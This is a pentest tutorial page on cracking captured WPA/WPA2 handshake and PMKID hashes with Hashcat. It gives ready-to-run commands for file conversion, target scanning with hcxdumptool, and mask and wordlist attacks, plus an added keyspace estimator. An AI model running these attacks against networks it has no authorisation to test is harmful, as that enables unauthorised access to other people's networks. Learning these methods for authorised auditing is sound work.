# Hashcat Cracking

## <mark style="color:blue;">Overview</mark>

Cracking Wi-Fi passwords using Hashcat is a technique employed to recover the original password from a captured Wi-Fi handshake or PMKID hash. Hashcat is a powerful password recovery tool that utilizes the computational power of GPUs or CPUs to perform brute-force, dictionary, or mask-based attacks. By leveraging various attack modes and wordlists, Hashcat attempts to find the correct password by hashing and comparing it to the captured hash. This process can be time-consuming and resource-intensive, depending on the complexity of the password and the available computing power. It is important to note that cracking Wi-Fi passwords without proper authorization is illegal and unethical.

You can find the official Hashcat documentation (and how to use it) here:

{% embed url="<https://hashcat.net/wiki/doku.php?id=mask_attack>" %}

## <mark style="color:blue;">Cracking WPA WIFI Handshake</mark>

1. Converting the cap file

* Converting the captured cap file into an hccapx file

```
sudo /usr/share/hashcat-utils/cap2hccapx.bin captured_file.cap wpa2.hccapx
```

* Converting the captured cap file into an hc22000 file

```
hcxpcapngtool -o wpa2.hc22000 captured_file.cap
```

2. Cracking the hc22000 file using Hashcat

* Check the GPU:

```
hashcat -I
```

* Cracking an 8-digit WPA Wi-Fi password (hccapx method)

```
hashcat -m 2500 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d?d
```

{% hint style="info" %}
You can press "s" to see the status of the hashing.
{% endhint %}

{% hint style="info" %}
To show the cracked password, type:

\[the previous command] --show
{% endhint %}

* Incrementing from 8 to 20 digits for a WPA2 Wi-Fi password (hccapx method)

```
hashcat -m 2500 -a 3 wpa2.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
```

* Cracking an 8-digit WPA Wi-Fi password (hc22000 method)

```
hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d
```

* Cracking a 10-digit WPA Wi-Fi password (hc22000 method)

```
hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
```

* Cracking a 10-character WPA Wi-Fi password made of digits and letters (lowercase and uppercase) (hc22000 method)

```
hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1
```

* Incrementing from 8 to 18 digits for a WPA2 Wi-Fi password (hc22000 method)

```
hashcat -m 22000 wpa2.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
```

* Incrementing from 8 to 12 characters made of digits and letters (lowercase and uppercase) for a WPA2 Wi-Fi password (hc22000 method)

```
hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1
```
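Seen from the defender's side, the masks above differ enormously in how much work they represent. The following added example (not part of the original page) counts the candidates a hashcat-style mask generates, including the `-1` custom charset and `--increment` ranges, and converts that to a worst-case time. The function names and the `RATE` figure are assumptions for illustration.

```python
import math
import string

# hashcat's built-in mask charsets ?d ?l ?u ?s, with ?a as their union.
BUILTIN = {
    "d": set(string.digits),
    "l": set(string.ascii_lowercase),
    "u": set(string.ascii_uppercase),
    "s": set(" " + string.punctuation),
}
BUILTIN["a"] = set().union(*BUILTIN.values())

def tokens(spec, custom):
    """Yield the set of characters allowed at each position of a mask."""
    table = {**BUILTIN, **custom, "?": {"?"}}  # "??" is a literal question mark
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            if spec[i + 1] not in table:
                raise ValueError(f"unsupported charset ?{spec[i + 1]}")
            yield table[spec[i + 1]]
            i += 2
        else:
            yield {spec[i]}                    # any other character is a literal
            i += 1

def candidate_count(mask, custom1=None, inc_min=None, inc_max=None):
    """Count candidates for a mask; pass inc_min/inc_max to model --increment."""
    custom = {"1": set().union(*tokens(custom1, {}))} if custom1 else {}
    sizes = [len(chars) for chars in tokens(mask, custom)]
    lo = inc_min or len(sizes)
    hi = min(inc_max or len(sizes), len(sizes))
    # --increment tries every prefix of the mask from lo to hi positions.
    return sum(math.prod(sizes[:n]) for n in range(lo, hi + 1))

def years_to_exhaust(count, rate):
    """Worst-case years to try every candidate at `rate` guesses per second."""
    return count / rate / (365 * 24 * 3600)

if __name__ == "__main__":
    RATE = 1_000_000  # assumed guesses/second; substitute a measured benchmark
    for label, args in [("8 digits", ("?d" * 8,)),
                        ("10 alphanumeric", ("?1" * 10, "?d?l?u")),
                        ("8-12 alphanumeric", ("?1" * 12, "?d?l?u", 8, 12))]:
        n = candidate_count(*args)
        print(f"{label:18} {n:.2e} candidates, {years_to_exhaust(n, RATE):.2e} years")
```

A WPA2 passphrase may be 8 to 63 characters long, so the digit-only masks on this page cover only the weakest end of what the standard allows.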

## <mark style="color:blue;">Cracking PMKID</mark>

1. Converting the captured pcapng file into an hc22000 file

```
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
```

{% hint style="info" %}
essidlist: a list containing all SSIDs captured previously

hash.hc22000: the new format of the captured file
{% endhint %}

2. Finding the MAC address of the target Wi-Fi

First, stop all services accessing the Wi-Fi network:

```
sudo systemctl stop NetworkManager.service 
sudo systemctl stop wpa_supplicant.service
```

Second, scan:

```
sudo hcxdumptool --do_rcascan -i [interface]
```

Finally, copy the MAC address into any file and complete the remaining steps.

{% hint style="info" %}
You can restart the network services.

Not restarting them is not a problem, but in later work with Kali you may face problems connecting to the internet.
{% endhint %}

3. Cracking the hc22000 file using Hashcat

* Cracking the Wi-Fi password using a wordlist

```
hashcat -m 22000 hash.hc22000 wordlist.txt
```

{% hint style="info" %}
You can edit the hash.hc22000 file and delete the unneeded data belonging to other Wi-Fi networks.
{% endhint %}

{% hint style="info" %}
You can use any wordlist you want in this command (example: rockyou.txt).
{% endhint %}

* Brute forcing an 8-digit Wi-Fi password

```
hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
```

* Brute forcing an 8 to 18 digit Wi-Fi password

```
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
```

## <mark style="color:blue;">Using GPU Cloud</mark>

You can watch [This YouTube Video](https://www.youtube.com/watch?v=nHDixd-EdEQ) created by [David Bombal](https://www.youtube.com/@davidbombal) to learn more about cracking Wi-Fi passwords using a GPU cloud: how to set up a cloud and how to run the attack.

## <mark style="color:blue;">Other YouTube Tutorials</mark>

You can check these YouTube videos/tutorials about Hashcat cracking:

* [This YouTube Video](https://www.youtube.com/watch?v=Usw0IlGbkC4) (PMKID Cracking) created by [David Bombal](https://www.youtube.com/@davidbombal)
* [This YouTube Video](https://www.youtube.com/watch?v=J8A8rKFZW-M) (Brute Force WPA2) created by [David Bombal](https://www.youtube.com/@davidbombal)
* [This YouTube Video](https://www.youtube.com/watch?v=ZTIB9Ki9VtY) (Brute forcing using powerful GPU) created by [David Bombal](https://www.youtube.com/@davidbombal)
* [This YouTube Video](https://www.youtube.com/watch?v=nHDixd-EdEQ) (Cracking using GPU Cloud) created by [David Bombal](https://www.youtube.com/@davidbombal)

For more details about password attacks and Hashcat, check these chapters:

{% content-ref url="../password-attacks" %}
[password-attacks](https://hackingforbabies.gitbook.io/en/password-attacks)
{% endcontent-ref %}

{% content-ref url="../password-attacks/hashcat" %}
[hashcat](https://hackingforbabies.gitbook.io/en/password-attacks/hashcat)
{% endcontent-ref %}

